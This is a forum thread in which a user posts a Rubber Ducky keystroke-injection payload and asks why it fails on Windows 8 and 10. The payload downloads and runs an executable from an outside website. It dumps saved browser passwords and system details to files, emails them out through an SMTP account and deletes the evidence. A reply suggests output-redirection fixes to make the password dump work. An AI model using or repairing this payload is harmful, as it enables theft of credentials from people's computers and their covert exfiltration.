Jump to content
Robert.sz

grab browsers password

Recommended Posts

Hello I'm wondering if it is possible to use if and else statement with rubber ducky.

I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work.

Here is my payload :

DELAY 1000
GUI r
DELAY 500
STRING cmd /T:01 /K \"@echo
ENTER
DELAY 500
STRING mode con:cols=15 lines=1
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe');
ENTER
DELAY 500
STRING cd %tmp%
ENTER
DELAY 500
STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt
DELAY 500
ENTER
STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt
ENTER
DELAY 500
STRING start web.exe /stext pwd.txt
ENTER
DELAY 500
REM -------------email log
STRING powershell
ENTER
DELAY 500
STRING $SMTPServer = 'smtp.mail.yahoo.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'user@yahoo.com'
ENTER
STRING $ReportEmail.To.Add('user2@yahoo.com')
ENTER
STRING $ReportEmail.Subject = 'Duck Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('pwd.txt')
ENTER
STRING $ReportEmail.Attachments.Add('info.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 500
REM ---------------------delete and end
STRING del web.exe
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING del pwd.txt
ENTER
DELAY 500
STRING del info.txt
ENTER
DELAY 100
STRING exit
ENTER

My problem is this line " STRING start web.exe /stext pwd.txt " doesn't  work on windows 8 and 10 only on in windows 7.

I try to do in this way " STRING start web.exe /stext > pwd.txt  " it create a pw.txt but it is empty.

Any idea it is appreciated !

Share this post


Link to post
Share on other sites

You might want to try using cmd to capture the output? you can try

STRING cmd web.exe > pw.txt 

that may be a simple fix, however if you are still not capturing the information, you may wish to try

STRING cmd web.exe > pw.txt 2>&1

this means that you will capture the error output as well (where it may be getting written). For a more detailed description have a look into Stream 1 (STDOUT) and stream 2 (SDTERR) outputs.

hope that helps 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...